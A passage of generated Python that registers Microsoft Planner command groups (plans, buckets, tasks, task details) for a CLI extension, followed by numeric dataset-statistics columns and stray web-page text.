planner_user_planner_task = _planner_operation_type('_users_planner_tasks_operations', 'UsersPlannerTasksOperations', cf_user_planner_task)
def load_command_table(self, _):
    """Register all generated `planner` command groups with the CLI.

    Each table entry maps a CLI group name to its CliCommandType, client
    factory, extra ``command_group`` keyword arguments and the hyphenated
    sub-command names. The backing custom-function name is derived
    mechanically from the pair: the group name with spaces and hyphens
    turned into underscores, joined to the command name with its hyphens
    turned into underscores (e.g. ``planner group-planner`` +
    ``create-plan`` -> ``planner_group_planner_create_plan``).
    """
    # Shared command-name sets; each group below reuses one of them.
    owner_cmds = ('delete-planner', 'show-planner', 'update-planner')
    plan_cmds = ('create-plan', 'delete-plan', 'list-plan', 'show-plan', 'update-plan')
    task_cmds = ('create-task', 'delete-task', 'list-task', 'show-task', 'update-task')
    plan_child_cmds = (
        'create-bucket', 'create-task', 'delete-bucket', 'delete-detail', 'delete-task',
        'list-bucket', 'list-task', 'show-bucket', 'show-detail', 'show-task',
        'update-bucket', 'update-detail', 'update-task',
    )
    # delete/show/update over the four task-detail/board-format resources.
    format_cmds = tuple(
        '%s-%s' % (verb, target)
        for verb in ('delete', 'show', 'update')
        for target in (
            'assigned-to-task-board-format',
            'bucket-task-board-format',
            'detail',
            'progress-task-board-format',
        )
    )
    user_planner_cmds = (
        'create-plan', 'create-task', 'delete-plan', 'delete-task', 'list-plan',
        'list-task', 'show-plan', 'show-task', 'update-plan', 'update-task',
    )
    planner_root_cmds = (
        'create-bucket', 'create-plan', 'create-task',
        'delete-bucket', 'delete-plan', 'delete-task',
        'list-bucket', 'list-plan', 'list-task',
        'show-bucket', 'show-plan', 'show-task',
        'update-bucket', 'update-plan', 'update-task',
    )
    table = (
        ('planner group', planner_group, cf_group, {}, owner_cmds),
        ('planner group-planner', planner_group_planner, cf_group_planner, {}, plan_cmds),
        ('planner group-planner-plan', planner_group_planner_plan, cf_group_planner_plan, {}, plan_child_cmds),
        ('planner group-planner-plan-bucket', planner_group_planner_plan_bucket, cf_group_planner_plan_bucket, {}, task_cmds),
        ('planner group-planner-plan-bucket-task', planner_group_planner_plan_bucket_task, cf_group_planner_plan_bucket_task, {}, format_cmds),
        ('planner group-planner-plan-task', planner_group_planner_plan_task, cf_group_planner_plan_task, {}, format_cmds),
        ('planner planner', planner_planner_planner, cf_planner_planner, {}, ('create', 'show-planner')),
        ('planner', planner_planner, cf_planner, {'is_experimental': True}, planner_root_cmds),
        ('planner planner-bucket', planner_planner_bucket, cf_planner_bucket, {}, task_cmds),
        ('planner planner-bucket-task', planner_planner_bucket_task, cf_planner_bucket_task, {}, format_cmds),
        ('planner planner-plan', planner_planner_plan, cf_planner_plan, {}, plan_child_cmds),
        ('planner planner-plan-bucket', planner_planner_plan_bucket, cf_planner_plan_bucket, {}, task_cmds),
        ('planner planner-plan-bucket-task', planner_planner_plan_bucket_task, cf_planner_plan_bucket_task, {}, format_cmds),
        ('planner planner-plan-task', planner_planner_plan_task, cf_planner_plan_task, {}, format_cmds),
        ('planner planner-task', planner_planner_task, cf_planner_task, {}, format_cmds),
        ('planner user', planner_user, cf_user, {}, owner_cmds),
        ('planner user-planner', planner_user_planner, cf_user_planner, {}, user_planner_cmds),
        ('planner user-planner-plan', planner_user_planner_plan, cf_user_planner_plan, {}, plan_child_cmds),
        ('planner user-planner-plan-bucket', planner_user_planner_plan_bucket, cf_user_planner_plan_bucket, {}, task_cmds),
        ('planner user-planner-plan-bucket-task', planner_user_planner_plan_bucket_task, cf_user_planner_plan_bucket_task, {}, format_cmds),
        ('planner user-planner-plan-task', planner_user_planner_plan_task, cf_user_planner_plan_task, {}, format_cmds),
        ('planner user-planner-task', planner_user_planner_task, cf_user_planner_task, {}, format_cmds),
    )
    for group_name, command_type, factory, extra_kwargs, commands in table:
        # e.g. 'planner user-planner-plan' -> 'planner_user_planner_plan'
        prefix = group_name.replace(' ', '_').replace('-', '_')
        with self.command_group(group_name, command_type, client_factory=factory, **extra_kwargs) as g:
            for command in commands:
                g.custom_command(command, '%s_%s' % (prefix, command.replace('-', '_')))
| 50.37299
| 160
| 0.749713
| 3,899
| 31,332
| 5.505001
| 0.030008
| 0.066856
| 0.133712
| 0.083023
| 0.922428
| 0.888278
| 0.848258
| 0.806886
| 0.776556
| 0.727544
| 0
| 0
| 0.155017
| 31,332
| 621
| 161
| 50.454106
| 0.810727
| 0.018192
| 0
| 0.244898
| 0
| 0
| 0.534149
| 0.469787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001855
| false
| 0
| 0.003711
| 0
| 0.005566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.